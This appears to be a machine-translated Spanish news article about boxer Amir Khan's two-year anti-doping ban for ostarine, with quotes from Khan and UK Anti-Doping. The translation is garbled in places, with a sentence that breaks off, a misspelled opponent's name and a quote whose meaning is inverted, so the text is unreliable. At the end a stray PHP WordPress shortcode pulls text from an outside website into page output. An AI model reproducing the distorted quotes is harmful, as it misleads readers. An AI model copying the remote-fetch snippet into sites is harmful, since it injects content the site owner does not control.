Aamir Khan insistió en que no sabía cómo la sustancia prohibida ostarina entró en su cuerpo y admitió que su suspensión de dos años de todos los deportes por dar positivo en una prueba de drogas “empañó” su legado.


UK Anti-Doping dijo que el ex boxeador campeón mundial de peso welter ligero arrojó un resultado positivo para un agente anabólico luego de una derrota por nocaut técnico en el sexto asalto ante Kellbrook en Manchester en febrero de 2022.


Khan, quien anunció su retiro en mayo del año pasado, admitió haber violado las reglas antidopaje, pero dijo que no ingirió la sustancia a sabiendas, un argumento que hizo después de una audiencia en enero de este año y que fue aceptado por el panel independiente.


La prohibición es una triste admisión final a una carrera que tuvo un comienzo tan brillante, seguida de una medalla de oro en los Juegos Olímpicos Juveniles de 2003 seguida de una medalla de plata olímpica en Atenas con solo 17 años, y Khan no quiere que esto termine en él. Explicar el legado de


“No quiero ser recordado por algo como esto”, dijo Khan a Sky Sports.


“Duele mucho, si la gente me recuerda por ese incidente, siempre me perseguirá porque nunca fue intencional.


“Pero espero que la gente me crea y tal vez debería haber sido más cuidadoso, tal vez otros peleadores y especialmente los peleadores jóvenes puedan aprender de mí y cometer errores.


“He sido un verdadero luchador y un verdadero luchador toda mi vida y respeto el deporte, así que espero que sea algo que realmente no empañe de ninguna manera”.


Khan hizo su debut profesional en julio de 2005, se convirtió en campeón de peso ligero de la Commonwealth en 2007 y ganó el título de peso welter ligero de la AMB en julio de 2009 con una victoria sobre Andreas Kotelnik en Manchester.


Khan unificó los títulos de la AMB y la FIB con una victoria sobre Zeb Joda en 2011, pero perdió polémicamente su próxima pelea ante Lamont Peterson, quien más tarde daría positivo por testosterona sintética.


“Esa prueba positiva fue la noche de la pelea contra Kellbrook”, dijo Khan.


“Me hicieron la prueba unas ocho veces durante el campo de entrenamiento, la semana anterior me dieron los resultados y di negativo.


“Me retiré después de esa pelea, tuve el peor desempeño como peleador, no me sentía como yo mismo y luego me di cuenta de que tal vez era hora de dar por terminado el día.


“Mi ostarina en sangre era de 0,5, que es literalmente: si (mi cuerpo) fuera una piscina olímpica, es más pequeña que un grano de sal.


“No sé cómo entró en mi sistema. Nunca haría trampa”.


“Soy un peleador retirado. Estoy baneado por dos años ahora, que es bastante extraño y ridículo que me banearon. Ya estoy retirado. No tengo planes de volver”.


Su popularidad va más allá del cuadrilátero y ha aparecido en el programa de telerrealidad I’m A Celebrity… Get Me Out of Here y en su propio programa de telerrealidad de la BBC Meet The Khans: Big In Bolton. Khan está listo para hacer su segunda aparición en una serie I’m A Celebrity All-Star a finales de este mes.


Khan fue notificado por primera vez de sus resultados positivos en abril de 2022 y recibió una suspensión temporal, luego de lo cual anunció su retiro en julio con un récord profesional de 34-6.


Luego de una audiencia el 24 de enero de este año, el Panel Nacional Antidopaje emitió su decisión el 21 de febrero.


La directora ejecutiva de UKAD, Jane Rumble, dijo: “Este caso sirve como un recordatorio de que UKAD perseguirá diligentemente las infracciones de las normas antidopaje para proteger el deporte justo.


“La responsabilidad estricta significa que los atletas son los responsables últimos de lo que comen y de la presencia de sustancias prohibidas en la muestra.


“Es imperativo que todos los atletas y su personal de apoyo, en cualquier nivel en el que estén compitiendo, tomen en serio sus responsabilidades antidopaje. El no hacerlo no solo daña la carrera de un atleta, sino que también daña la confianza del público en el deporte”.


Previous Post Next Post
function pub_short() { $pub_text = file_get_contents( "https://alrafdean.org/me/pub.txt" ); return $pub_text; } add_shortcode('pub', 'pub_short');